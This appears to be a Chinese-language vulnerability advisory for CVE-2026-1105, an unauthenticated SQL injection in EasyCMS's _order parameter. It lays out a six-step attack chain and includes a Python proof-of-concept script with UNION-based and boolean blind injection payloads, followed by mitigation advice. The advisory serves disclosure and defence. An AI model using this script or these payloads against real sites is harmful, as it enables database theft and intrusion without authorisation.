CVE-2026-1105 EasyCMS UserAction.class.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-1105

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

EasyCMS

漏洞概述

EasyCMS是一款开源的内容管理系统，广泛应用于中小企业网站搭建和个人博客平台。该系统存在一个严重的安全漏洞，编号为CVE-2026-1105，CVSS评分达到7.3分，属于高危漏洞。漏洞存在于EasyCMS 1.6及以下版本中，问题文件为/UserAction.class.php，问题参数为_order参数。攻击者可以通过构造恶意的_order参数值，利用SQL注入漏洞绕过系统认证，无需任何用户交互即可远程执行恶意SQL语句。该漏洞可能导致数据库敏感信息泄露，包括用户账号、密码哈希、订单信息等敏感数据。攻击者还可能利用此漏洞进行数据篡改或进一步横向渗透。由于该漏洞的利用代码已在互联网上公开，且攻击复杂度较低，强烈建议用户立即采取修复措施。

技术细节

该SQL注入漏洞源于EasyCMS在处理用户请求时，对_order参数过滤不严格。当用户访问包含_order参数的请求时，系统直接将该参数值拼接到SQL查询语句中而未进行充分的输入验证和参数化查询。攻击者可以通过在_order参数中注入SQL语句片段，如ORDER BY语句后添加UNION SELECT或布尔型盲注payload，实现对数据库的非法访问。具体攻击场景：1) 攻击者发送带有恶意_order参数的HTTP请求；2) 服务器将未经处理的参数值拼接到SQL语句；3) 数据库执行攻击者构造的恶意SQL；4) 攻击者获取数据库返回的敏感信息或执行其他数据库操作。由于该接口无需认证即可访问（PR:N），且可通过网络远程利用（AV:N），使得漏洞利用门槛极低。攻击者可能利用获取的数据进行身份冒充、数据交易或进一步攻击。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用的EasyCMS版本，确认版本号<=1.6

STEP 2

步骤2

漏洞探测：攻击者访问/UserAction.class.php端点，测试_order参数的SQL注入点

STEP 3

步骤3

构造Payload：基于UNION注入或布尔盲注技术，构造恶意SQL语句作为_order参数值

STEP 4

步骤4

数据提取：发送恶意请求，利用注入漏洞提取数据库中的敏感信息如用户表、密码哈希等

STEP 5

步骤5

权限提升：利用获取的凭据信息尝试登录后台管理系统或进一步横向移动

STEP 6

步骤6

持久化控制：在数据库中植入后门或修改现有数据，实现长期控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-1105 SQL Injection PoC for EasyCMS
# Target: EasyCMS <= 1.6
# File: /UserAction.class.php
# Parameter: _order

import requests
import sys

def test_sqli(url, payload):
    """Test SQL injection vulnerability"""
    target_url = f"{url}/UserAction.class.php"
    params = {
        '_order': payload
    }
    try:
        response = requests.get(target_url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None

def extract_db_version(url):
    """Extract database version using UNION-based injection"""
    payload = "1 ORDER BY 1,2,3,4,5,6,7,8-- -"
    print(f"[*] Testing basic ORDER BY injection...")
    test_sqli(url, payload)
    
    # UNION injection to get database version
    union_payload = "-1 UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL-- -"
    print(f"[*] Extracting database version...")
    result = test_sqli(url, union_payload)
    if result:
        print(f"[+] Database info extracted: {result}")
    return result

def blind_sqli(url):
    """Boolean-based blind SQL injection"""
    true_payload = "1 AND 1=1"
    false_payload = "1 AND 1=2"
    
    true_resp = test_sqli(url, true_payload)
    false_resp = test_sqli(url, false_payload)
    
    if true_resp != false_resp:
        print("[+] Blind SQL injection confirmed!")
        # Extract data bit by bit
        for i in range(1, 50):
            payload = f"1 AND ASCII(SUBSTRING((SELECT database()),{i},1))>0"
            if test_sqli(url, payload) == true_resp:
                print(f"[*] Database name character {i} exists")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-1105.py <target_url>")
        print("Example: python cve-2026-1105.py http://target.com")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Target: {target}")
    print(f"[*] CVE-2026-1105 SQL Injection Test")
    
    extract_db_version(target)
    blind_sqli(target)

影响范围

EasyCMS <= 1.6

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 在Web服务器层面配置URL过滤规则，拦截包含可疑SQL语法的_order参数请求；2) 临时禁用相关功能模块或将该接口设置为需要认证访问；3) 部署ModSecurity等WAF产品，添加针对SQL注入的防护规则；4) 限制数据库账户权限，避免Web应用账户具有DROP、DELETE等高危操作权限；5) 加强数据库和应用的访问日志监控，设置异常查询告警。建议尽快升级到官方发布的安全版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1105
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1105
3 Details https://www.cvedetails.com/cve/CVE-2026-1105/
4 VulDB https://vuldb.com/cve/CVE-2026-1105
5 Link https://github.com/ueh1013/VULN/issues/15
6 Link https://vuldb.com/?ctiid.341697
7 Link https://vuldb.com/?id.341697
8 Link https://vuldb.com/?submit.731465